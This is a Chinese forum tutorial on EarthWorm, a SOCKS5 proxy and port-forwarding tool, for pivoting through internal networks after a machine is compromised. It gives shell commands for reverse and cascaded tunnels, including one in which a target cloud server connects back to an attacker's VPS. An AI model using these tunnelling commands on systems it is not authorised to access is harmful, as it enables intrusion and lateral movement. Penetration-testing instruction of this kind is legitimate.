0x00 前言 当你在内网渗透,并且拿下一台机器的权限时,你是不是觉得已经算是一次完整的渗透了? 不来一次内网漫游,渗透是不完整的,哈哈。
本文给大家推荐一款内网穿透神器EarthWorm,(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。
它强在哪些方面呢? 1.可穿透复杂的内网环境。(这么说吧:我本地连着路由器开一个虚拟机,可以直接反弹到公网的云服务器上。) 2.以支持多平台间的转接通讯,Linux、Windows、MacOS、Arm-Linux均支持。 支持平台列表:(可跨平台反弹)
ew_for_Win.exe 适用各种Windows系统(X86指令集、X64指令集) Windows7、Windows XP ew_for_Linux32 各常见Linux发行版 (X86 指令集 CPU) Ubuntu(X86)/BT5(X86) ew_for_linux64 各常见Linux发行版 (X64 指令集 CPU) Ubuntu(X64)/Kali(X64) ew_for_MacOSX64 MacOS系统发行版 (X64 指令集) 苹果PC电脑,苹果server ew_for_Arm32 常见Arm-Linux系统 HTC New One(Arm-Android)/小米路由器(R1D) ew_mipsel 常见Mips-Linux系统 (Mipsel指令集 CPU) 萤石硬盘录像机、小米mini路由器(R1CM)
3.png (44.43 KB, 下载次数: 14)
下载附件
保存到相册
2018-3-21 13:19 上传
0x01 使用方法
以下所有样例,如无特殊说明代理端口均为1080,服务均为SOCKSv5代理服务. 该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。 1.正向SOCKS v5服务器
[Shell] 纯文本查看 复制代码
$ . /ew -s ssocksd -l 1080
|
2. 反弹 SOCKS v5 服务器 这个操作具体分两步: a) 先在一台具有公网 ip 的主机A上运行以下命令: [Shell] 纯文本查看 复制代码
$ . /ew -s rcsocks -l 1080 -e 8888
|
b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口 [Shell] 纯文本查看 复制代码
$ . /ew -s rssocks -d 1.1.1.1 -e 8888
|
成功。 3. 多级级联 工具中自带的三条端口转发指令,它们的参数格式分别为: [Shell] 纯文本查看 复制代码
1
2
3
|
$ . /ew -s lcx_listen -l 1080 -e 8888
$ . /ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ . /ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
|
通过这些端口转发指令可以将处于网络深层的基于TCP的服务转发至根前,比如 SOCKS v5。 首先提供两个“二级级联”本地SOCKS测试样例: a) lcx_tran 的用法 [Shell] 纯文本查看 复制代码
1
2
|
$ . /ew -s ssocksd -l 9999
$ . /ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
|
b) lcx_listen、lcx_slave 的用法
[Shell] 纯文本查看 复制代码
1
2
3
|
$ . /ew -s lcx_listen -l 1080 -e 8888
$ . /ew -s ssocksd -l 9999
$ . /ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
|
再提供一个“三级级联”的本地SOCKS测试用例以供参考
[Shell] 纯文本查看 复制代码
1
2
3
4
|
$ . /ew -s rcsocks -l 1080 -e 8888
$ . /ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ . /ew -s lcx_listen -l 9999 -e 7777
$ . /ew -s rssocks -d 127.0.0.1 -e 7777
|
数据流向: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks
0x02 实战测试(分为本地测试和公网IP测试) 一般最常用的就是上面的第二条:反弹 SOCKS v5 服务器。 使用实例1: 目标机器:
[Shell] 纯文本查看 复制代码
ew.exe -s rssocks -d 2.2.2.2 -e 888
|
(2.2.2.2为想要反弹到的机器) 攻击机器:
[Shell] 纯文本查看 复制代码
ew.exe -s rcsocks -l 1008 -e 888
|
(监听888端口,转发到1008端口) 测试环境: 在这里我直接用我的本机Win10作为目标机器,将虚拟机Win7作为攻击机器。
本机Win10 ip:192.168.62.1 Win7 ip:192.168.62.128
首先攻击机器win7运行命令:
[Shell] 纯文本查看 复制代码
ew_for_Win.exe -s rcsocks -l 1008 -e 888
|
接收888端口的数据并转发到1008端口。
此时正在监听。 目标机器Win10运行命令:
[Shell] 纯文本查看 复制代码
ew_for_Win.exe -s rssocks -d 192.168.62.128 -e 888
|
此时攻击机器会弹出连接成功的提示:
好了,到此Win10的SOCKS5代理就反弹到Win7攻击机上了。 只需要一个Socks5连接工具就可以连接到本地1008端口来代理访问了。 推荐工具SocksCap64。
在代理处配置127.0.0.1:1008 代理已连接。 使用实例2: 攻击者洛杉矶 Linux VPS :45.78.*.* 目标阿里云服务器 Win2008:47.93.*.* 攻击者Linux监听:
[Shell] 纯文本查看 复制代码
目标阿里云服务器反弹:
[Shell] 纯文本查看 复制代码
ew_for_Win.exe -s rssocks -d 45.78.*.* -e 888
|
攻击机器监听出现:rssocks cmd_socket OK! 表示反弹成功。 0x03 工具下载 分别是EarthWorm和SocksCap64。
|
.keke_tieng{ border:1px solid #E3E3E3; background:#efefef; padding:5px;/* border-radius:10px; -moz-border-radius:10px; -webkit-border-radius:10px;*/ margin:15px auto; }
.keke_tieng .tienegbox{ background:#fff; padding:15px;/*border-radius:10px; -moz-border-radius:10px; -webkit-border-radius:10px;*/}
.keke_tieng .ngleft,.keke_tieng .ngright{ width:49%;}
.keke_tieng .ngleft{ float:left;}
.keke_tieng .ngright{ float:right}
.keke_tieng .hd{ width:100%; float:left; margin:0px 0px 10px 0px;height:28px;overflow:hidden;}
.keke_tieng .hd a{line-height:28px; height:28px;width:100%;margin-left:10px; font-size:16px;font-family:"Microsoft Yahei"; font-weight:bold}
.keke_tieng .hd h2{color:#FFF;width:62px;margin:0px;text-align:center;line-height:28px; height:28px; float:left}
.keke_tieng .ngleft .hd h2{background:url(source/plugin/keke_tieng/template/images/tbga.png) no-repeat right;}
.keke_tieng .ngright .hd h2{background:url(source/plugin/keke_tieng/template/images/tbgb.png) no-repeat right;}
.keke_tieng li{ width:100%; float:left; height:29px; overflow:hidden; line-height:29px; color:#fd6666;}
.keke_tieng li span{ float:right; width:50px; font-size:14px; color:#999; line-height:29px; text-align:right; padding-right:5px;}
.keke_tieng li a{height:29px; font-size:14px; font-family:"Microsoft Yahei"; line-height:29px;color:#333333}
.keke_tieng li a.bk{margin-right:3px; color:#FF9966}
.clear{ clear:both; }
.exx_zan {
width: 75px;
margin: 40px auto 0;
height: 75px;
position: relative;
clear: both;
}.exx_zan a.zan:link, .exx_zan a.zan:visited {
color: #fff;
text-decoration: none;
}.exx_zan a.zan {
width: 75px;
height: 75px;
background: url(https://bbs.ichunqiu.com/source/plugin/exx_like/template/images/dianzan.png) no-repeat 0 0;
display: block;
}.exx_zan a.zan:hover{
background: url(https://bbs.ichunqiu.com/source/plugin/exx_like/template/images/dianzan.png) no-repeat -95px 0;
}
.exx_zan a.zan em {
width: 75px;
text-align: center;
padding: 48px 0 0;
display: block;
color: #fff;
font-size:12px;
line-height:20px;
}
.pcb{margin-right:0}